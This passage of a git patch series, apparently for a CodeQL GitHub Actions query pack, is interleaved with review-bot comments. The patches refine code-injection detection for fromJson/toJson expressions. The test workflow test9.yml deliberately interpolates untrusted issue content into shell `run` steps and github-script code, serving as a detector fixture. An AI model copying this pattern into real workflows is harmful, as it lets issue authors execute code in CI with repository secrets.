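reference. */`, should replace the misleading one. The helper is complete within the hunk.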
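Review bot: The `exists(string expr | ... )` prologue that picks either the `fromJSON(...)` argument or the plain expression is pasted verbatim into `SecretsExpressionImpl` here and again into the `Steps`, `Needs`, `Jobs`, `Env` and `Matrix` constructors in the following hunks, so any later fix to the `fromjson` regexp has to be made six times; a single helper next to `getAJsonReferenceExpression` removes the duplication. Note also that `getAJsonReferenceExpression` accepts only a restricted character class as the argument while the constructor re-extracts it with the unrestricted `(?i)fromjson\\((.*)\\).*` on `normalizeExpr(expression)`, so the two regexps can disagree once `normalizeExpr` rewrites the text — the helper becomes the one place to reconcile them. The class header and the other members of `SecretsExpressionImpl` are outside the hunk.
```ql
/**
 * Gets the expression that `expression` ultimately refers to: the argument of a
 * `fromJSON(...)` call, or the (normalized) expression itself.
 */
bindingset[expression]
string getAReferenceTarget(string expression) {
  exists(getAJsonReferenceExpression(expression, _)) and
  result = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1)
  or
  exists(getASimpleReferenceExpression(expression, _)) and
  result = normalizeExpr(expression)
}

// … unchanged: class header and `fieldName` field …
  SecretsExpressionImpl() {
    exists(string expr | expr = getAReferenceTarget(expression) |
      expr.regexpMatch(secretsCtxRegex()) and
      fieldName = expr.regexpCapture(secretsCtxRegex(), 1)
    )
  }
```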
@@ -1255,9 +1277,18 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1287,10 +1318,19 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and - neededJob.getLocation().getFile() = this.getLocation().getFile() + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) } override string getFieldName() { result = fieldName } 
@@ -1320,9 +1360,18 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1370,8 +1419,17 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } 
@@ -1396,8 +1454,17 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) } override string getFieldName() { result = fieldAccess } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 000000000000..6ed7db83cb2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -0,0 +1,27 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1b98263c16e8..ff378f93af62 100644 
--- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | 
.github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -352,6 +365,10 @@ subpaths | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 35887c3b3707..19b72ad6b5c0 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | 
.github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7e0146d63499a15c309d0f75da286fbbd3e9dd9e Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:52:01 +0200 Subject: [PATCH 373/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5518e074d30a..320ef23e413a 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.10 +version: 0.1.11 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d4f97a32ec6a..e7a98574a89f 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.10 +version: 0.1.11 groups: [actions, queries] suites: codeql-suites extractor: javascript From c70fb6e9114303784e8761cebfe9c7e8927ac4b2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:25:24 +0200 Subject: [PATCH 374/707] Consider toJson as a sanitizer for Code Injection in JS --- ql/lib/codeql/actions/ast/internal/Ast.qll | 30 +++++++++++++++++-- .../Security/CWE-094/CodeInjectionCritical.ql | 6 ++++ .../Security/CWE-094/CodeInjectionMedium.ql | 6 ++++ .../CWE-094/.github/workflows/test9.yml | 12 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 7 +++++ .../CWE-094/CodeInjectionMedium.expected | 4 +++ 6 files changed, 63 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index c6569367c10e..7c7c6216b1b7 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
@@ -1194,14 +1194,40 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + bindingset[s] string getAJsonReferenceExpression(string s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() - .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) - .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) + .regexpFind("(?i)(from|to)json\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)(from|to)json\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 2) } /** diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index 7e14825a2952..3b968ceaf138 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql 
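Review bot: The comment copied into `getAFromJsonReferenceExpression` and `getAToJsonReferenceExpression` (and kept in `getAJsonReferenceExpression`) still says `regexpFind` collects all matches of `${{...}}`, but these predicates scan an already-unwrapped expression for `fromjson(...)` / `tojson(...)` calls; `// Find every fromJson(...) call in the expression (regexpFind, not a single greedy/reluctant match) and return its argument` describes what the code does. The three predicates differ only in the call name and `getAJsonReferenceExpression` is their union, so it could be written as `result = getAFromJsonReferenceExpression(s, offset) or result = getAToJsonReferenceExpression(s, offset)`, with the caveat that for a nested call such as `fromJson(toJson(x))` the combined regex yields one match where the union yields two, so the expected-output tests should confirm the choice. The repeated character class `[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]` now appears six times in this hunk and is easy to edit inconsistently; a short comment naming what it admits (a reference path with optional index, wildcard and nested-call characters) would help the next editor.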
@@ -25,6 +25,12 @@ where inPrivilegedCompositeAction(sink.getNode().asExpr()) or inPrivilegedExternallyTriggerableJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 7599ef8847ba..abecaf997c6b 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -24,6 +24,12 @@ where ( inNonPrivilegedCompositeAction(sink.getNode().asExpr()) or inNonPrivilegedJob(sink.getNode().asExpr()) + ) and + // exclude cases where the sink is a JS script and the expression uses toJson + not exists(UsesStep script | + script.getCallee() = "actions/github-script" and + script.getArgumentExpr("script") = sink.getNode().asExpr() and + exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) ) select sink.getNode(), source, sink, "Potential code injection in $@, which may be controlled by an external user.", sink, diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml index 6ed7db83cb2f..47e032fd7278 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml 
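Review bot: The new `not exists(UsesStep script | ...)` clause in CodeInjectionCritical.ql, duplicated verbatim in CodeInjectionMedium.ql in the next hunk, excludes a github-script sink as soon as a `toJson(` call appears anywhere in its expression text (`exists(getAToJsonReferenceExpression(...))`), not when the whole interpolated value is the result of `toJson`; if `getExpression()` returns the full expression, an expression that also carries references outside the `toJson(...)` call is dropped as sanitized. Requiring the full text to be one call, e.g. `sink.getNode().asExpr().(Expression).getExpression().regexpMatch("(?i)\\s*tojson\\([^()]*\\)\\s*")`, or checking that the captured argument spans the whole expression, keeps the exclusion narrow. Moving the shared clause into one predicate (say `isToJsonScriptSink(DataFlow::Node sink)` beside the existing `inPrivileged*` helpers) would stop the two copies drifting. The expected output committed alongside records `WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15)`, so this query still carries a dead `test` predicate outside the hunk.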
@@ -25,3 +25,15 @@ jobs: - run: echo ${{ needs.parse-issue.outputs.payload }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ fromJson(needs.parse-issue.outputs.payload).version }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ toJson(github.event.issue.title) }}.replaceAll(/"/g, '\\"')); + - uses: actions/github-script@v7 + with: + script: | + core.setOutput('issue_title', ${{ github.event.issue.title }}.replaceAll(/"/g, '\\"')); diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index ff378f93af62..7f99d7c9b835 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -1,3 +1,4 @@ +WARNING: Unused predicate test (CodeInjectionCritical.ql:21,11-15) edges | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | 
@@ -70,6 +71,7 @@ edges | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | 
@@ -264,6 +266,9 @@ nodes | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:31:42:31:99 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | +| .github/workflows/test9.yml:35:42:35:80 | toJson(github.event.issue.title) | semmle.label | toJson(github.event.issue.title) | +| .github/workflows/test9.yml:39:42:39:72 | github.event.issue.title | semmle.label | github.event.issue.title | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 